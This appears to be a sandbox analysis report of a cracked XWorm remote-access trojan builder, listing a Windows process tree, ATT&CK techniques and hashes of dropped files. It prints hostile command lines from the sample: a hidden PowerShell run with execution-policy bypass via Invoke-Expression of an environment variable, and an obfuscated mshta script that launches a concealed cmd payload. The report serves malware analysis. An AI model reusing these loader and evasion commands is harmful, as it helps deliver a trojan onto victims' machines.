"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7128 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2460 /prefetch:1
2⤵
PID:4596

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7120 /prefetch:1
2⤵
PID:3264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7296 /prefetch:1
2⤵
PID:1116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
2⤵
PID:1724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1
2⤵
PID:964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7348 /prefetch:1
2⤵
PID:1968

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7412 /prefetch:1
2⤵
PID:2932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
2⤵
PID:4988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7788 /prefetch:1
2⤵
PID:4116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7860 /prefetch:1
2⤵
PID:2868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7984 /prefetch:1
2⤵
PID:200

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7328 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7196 /prefetch:1
2⤵
PID:4780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1748,11347415038174177238,13417274533043299890,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7640 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1992

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2720

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3988

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4152

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\XWorm-V5.0.rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3952

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4656

C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe
"C:\Users\Admin\Desktop\XWorm-V5.0\XWorm V5.0.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/XCoderTools
2⤵
PID:2412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff9ac2f3cb8,0x7ff9ac2f3cc8,0x7ff9ac2f3cd8
3⤵
PID:844

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004DC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\XWorm-V5.6-Cracked-main\XWorm-V5.6-Cracked-main\XWormLauncher.bat" "
1⤵
PID:2284

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:EYqiZZZond; "
2⤵
PID:1432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3920

C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-bkLkOMLFgPrarqIrLnAN4312:wevMAYHF=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
1⤵
- Executes dropped EXE
- Modifies registry class
PID:2560

C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-bkLkOMLFgPrarqIrLnAN4312:wevMAYHF=%
2⤵
- Executes dropped EXE
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OdjrIqDhlz; "
3⤵
PID:232

C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2500

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
2⤵
- Checks processor information in registry
PID:4892

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.0.1032200725\2107734791" -parentBuildID 20221007134813 -prefsHandle 1744 -prefMapHandle 1736 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c5095fd-91af-444a-bc2d-8e1cdf266237} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 1836 24b15eec458 gpu
3⤵
PID:2356

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4892.1.613910021\2103697244" -parentBuildID 20221007134813 -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 20783 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f78fdc1-aacd-40f9-b6f1-9644978da0d3} 4892 "\\.\pipe\gecko-crash-server-pipe.4892" 2264 24b15e03258 socket
3⤵
PID:1612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:1460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9ac2f3cb8,0x7ff9ac2f3cc8,0x7ff9ac2f3cd8
2⤵
PID:4880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1832,6303240926415594856,8317188330167019532,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1840 /prefetch:2
2⤵
PID:3684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1832,6303240926415594856,8317188330167019532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
2⤵
PID:2008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1832,6303240926415594856,8317188330167019532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
2⤵
PID:2092

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,6303240926415594856,8317188330167019532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
2⤵
PID:1260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,6303240926415594856,8317188330167019532,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
2⤵
PID:2224

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\373df43e-bfd4-4d7b-a20d-f210929b538c.tmp
Filesize
11KB

MD5
7e1a95c1e4c771fe0ced19137452e0fe

SHA1
1aaa180ed7557e6493fb466a907a585a7faedda4

SHA256
e2fa290564dbacfbfba7b626b86f712a9c5a9eda76db085d2d643c324afcd5e1

SHA512
18add08c49d19657b107e3d3bd59b50536c28d9274a77c8a2b507e4017038116c86e30da1db37f60995168c4d7c85f40fb904e40d517ff9b8d0293db4ddc9456

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
5c48e8b68231fb5b2d7f1188b930bc0e

SHA1
1822aef5da8fdd47626fb91afcf79a2be175a325

SHA256
c3b287c29eaa57166b2ab1ba9bd0aaced13cc2f946a04b8d708ac429187fe944

SHA512
2bd09b83e44e0104fbe080a8573690217dc9fbf7fd59ff25a1a9e9ebd2d87ac533f9b99350773d081a7e748b39657115a13e94538b153bceb13ecdfc4672a0f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
3d2fdd24509dfbb3dbd21e3424e148bf

SHA1
ceead58e505a2d6eb4c035678ca3aff809620738

SHA256
87b19ffd387db2c3be7ed1b76977768ee47e9e0b431c0f513ca135519c5c18dc

SHA512
50a0779226a457802480415ee3ae78c389d09b142572f0811bae315a7b01fe091835c2c5f3418867fffbbf5c62cdca718ab1788d0602a2dda4b5e718a1c4b484

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
32e3d5b42c306b75a10282a28a11fe14

SHA1
b68dc95f30dab18628a0a71b3c69dc6d07600448

SHA256
965e9eed4aeed799678ccb566806247653d7d237032573be7e286d346e2d003a

SHA512
a66c8d95017f6b89281ee6b3822cca18fa98531cd2ca1872f7c62f573e371ca6375e23cae9d8c873df5194ed615738f6ff6e9e2ed66abb4f07222dd086fd9be3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
f2dc80f5403feb8461b7ffa09890d6a0

SHA1
d5b61e6d672e7e71571e0132e21cead181da8805

SHA256
eadeadba37eed18e5acba408d7e076270b00403fed372b77164577232232428a

SHA512
5e2119529b99b76be105c43714e4b9977ee2147172c1c44e92bd9b41fa7a66f55d4073c864aac668a912aff2898bd216fb38f2fe34ef65de69ad12965218caf5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\264cb79d-b27d-4afc-b021-0971fe5e6c5a.tmp
Filesize
9KB

MD5
eba03ac5efe00b93d30a6d97cbc7a7c1

SHA1
6639b6c91cb1f34d338b28c7d00d0fb9f7968f1a

SHA256
4b105a68c4acb64ef1bcc1bc4c9a4766d88a796f88c19df3dbb64fe5634cd2cb

SHA512
96647447596a4eb901fcb0eec46b95e3e568092ff7de07979c56cd201d5678962766b6625f9ab8d5c0a6c485539bef2348c5643b1302292b006c5a4aa0b6f2ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012
Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013
Filesize
67KB

MD5
d2d55f8057f8b03c94a81f3839b348b9

SHA1
37c399584539734ff679e3c66309498c8b2dd4d9

SHA256
6e273f3491917d37f4dbb6c3f4d3f862cada25c20a36b245ea7c6bd860fb400c

SHA512
7bcdbb9e8d005a532ec12485a9c4b777ddec4aee66333757cdae3f84811099a574e719d45eb4487072d0162fa4654349dd73705a8d1913834535b1a3e2247dc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014
Filesize
36KB

MD5
dfa06a2cf726c1772e54d6f0e7b57fe8

SHA1
6c843917d374a2f5f4fbc2e3cb620737c56f864f

SHA256
a99b0f8a4e209bf564f0570d79edc20f08244edae0a50da214ff32afc56d89fc

SHA512
046af2d7537f6985db4c55368d5d0865713dd955ef094ff3743b0899e8699edc17029c29bd15fdabe4f1258fd1e502372f0073bd2ed0e8d5060e384c0a397e2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015
Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016
Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017
Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018
Filesize
1.1MB

MD5
4aa32374606cca47f1cc7f0c9f4afa93

SHA1
7d7dedb3e23b5c5d8608ee9fea570806873f3538

SHA256
667571588960cbdca04cf7842cc1e06ae0abbb73fc3e4bf1f501ce6d01920519

SHA512
68309d5c866c958ef8d490e9e00876eada4b4b6bebac22147b245140893b989a4fe85f71d3bac06c57dca3767116478ddc02f74ec6068271d27393c650874380

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e
Filesize
49KB

MD5
e1f8c1a199ca38a7811716335fb94d43

SHA1
e35ea248cba54eb9830c06268004848400461164

SHA256
78f0f79cdd0e79a9fba9b367697255425b78da4364dc522bc59a3ce65fe95a6c

SHA512
12310f32ee77701c1e3491325a843d938c792f42bfdbbc599fe4b2f6703f5fe6588fbcd58a6a2d519050fc9ef53619e2e35dfadcbda4b218df8a912a59a5381a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f
Filesize
44KB

MD5
a9ed0f3a37bc313d7df62e595ca1ce2d

SHA1
3cd166ea5f37f3f645ebf7ee064057f7cd013eef

SHA256
3a44f7be6fcf889e508b789374c0fe29344dc6fa7a25348083888f7c98f0c57a

SHA512
6631523a8bd34ec39c69b2361c2192abfa998bea86d8690f0f5d25124b1ea4cbbef0e1d406b0afeffa5be537b9c75154fe7710c80650d9885ba81a444a30a5ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020
Filesize
24KB

MD5
e1831f8fadccd3ffa076214089522cea

SHA1
10acd26c218ff1bbbe6ac785eab5485045f61881

SHA256
9b9a4a9191b023df1aa66258eb19fc64ae5356cfc97a9dda258c6cc8ba1059ac

SHA512
372c486ac381358cc301f32cd89b7a05da7380c03fa524147c2ddf3f5e23f9b57c17485aaedc85b413461a879afc42e729547b0c96c26c49bbdb7301cd064298

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000026
Filesize
23KB

MD5
efe81e4daef615b00dbe73ce495ca572

SHA1
efa6284b26573a32770851c3ccfc54de3d6642d2

SHA256
8a2115d91ed4df1f74c0bff1d7800c6c776fed3addf7e6ce4637a1bd0c9f81be

SHA512
a561f8475dc2ec744dad499bfdb45b5c113a216d93c3873321e9fbbf22dfdde932af4dedd5819f4f4e0c8bd614efb77e68825561aaf05ec69c19df6eb7271b06

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
3KB

MD5
08f876b3793678c359184c38e409c9e6

SHA1
b61ea90c2ccd4e98f53a25ebf409e9c7c739ade5

SHA256
8a4391c8f40563e144be0c9b92653a22d8e4a78ddccd27632b38801ce049219f

SHA512
b316a8a70a6ca420e9fc70db38251dc7e22134f0fdd4ad1ff6f19870d6a95a4865e2678ca15824335ac0b32af01f9cf3497d39afa94935b004a9ca3ff249ce0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
4KB

MD5
5dc9fc832f6d01a4fce22955f9387b25

SHA1
aaf8a192f8e6a4bdcc930652543578649d2b211b

SHA256
43af182632c97a6d3c7428dd27de3d068a629679642b42a7032c40a1820afa41

SHA512
9760d98e305904310efd1b0caaaa3b3c067413d3ca8148482ebc341f58c39559fafe5d92d3d8f22db61612cbcd2e8bd9881dfa4c1804d0f05d951fe7b8226376

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
4KB

MD5
0bc75583bce0b502863968a15cdeec51

SHA1
83533e97b10ff41588669c46eeba86bbd7b081af

SHA256
9bbf865019cad49420d200c13254fb18b38e0649c7e7dda36807fa6cef6f06f1

SHA512
d22883fd1c342b5d62b970c19def994c991ebb9d186b5c822a1f7e208397d1f6b6a97b2564cb5259584f1aae9a7c8c78a7b76cae4c4488eb477082209b0905cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
408B

MD5
3ebdcfcec133eb0fe1867d92d2c2d785

SHA1
9b710b2527c197b0192fadef5847788765e6fd8d

SHA256
28e510a8db3a4ad1a2e58255661902f9d4ec4c1de8394683412961e2d7d68f83

SHA512
b08808f22ff3c66d82f19a76ddc0fb69e673bc6bc3888b361a20f63a14a333c4dc2aaabfffb808fabf988ffc58d721237cc20929be2f75c9adc81c6bd6508cc2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
384B

MD5
155556fa124bb31b81eb1d3b499737cb

SHA1
efdea17e34df67e70fc64404845f3c6d6f55099c

SHA256
9196d467880bf46a93c259b655f172d617a0c6bb1ad47a242e1c5c5c4e516934

SHA512
228f0ed9f0c42a14bf113bf7b7093c8bbb66284b374e2c433feea25be694c7d586818b3a8a8377f24a323b26a3f6dc0bd476f92450ea08c01c777bc27642960f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
3KB

MD5
4386fc0f8b5e1607a74a1343ddd627de

SHA1
f34baa4414344aead32e4cd6cabb3cda43913d1f

SHA256
93ebd38ec71be1a58f33c70b0ea9b3d0ece081e57eb7514269190cfeb5db395f

SHA512
42868b56fb9413a29db8eb6f5256c3b4f5dd05063dd76208d4b8df7379604796d08109c4af83f76ee7dc1b85a599afa35c8bb1fd5d69e58d133efca7257d18ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
4KB

MD5
8ccd71577134f2519f3ad71be0540156

SHA1
b3e1033c4e41943c155805a2ca71b0403ca78feb

SHA256
b84aaa1e80d917325dc6837adc9b0e0cb03d8382f449a698959cc8ae1bd1ef36

SHA512
f9679eb4a2b2f27f0326a8cfc6a72ea693d9115166de56b84a3791bed4df51c982e33e4a537e0242f83067de22d69bce03d66f7f6012b17d889b8c58ba7f6d6e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
4KB

MD5
d70612e408e5bc63598e14023a8d421f

SHA1
9021c2456124929df1f9680e8593f80375207dde

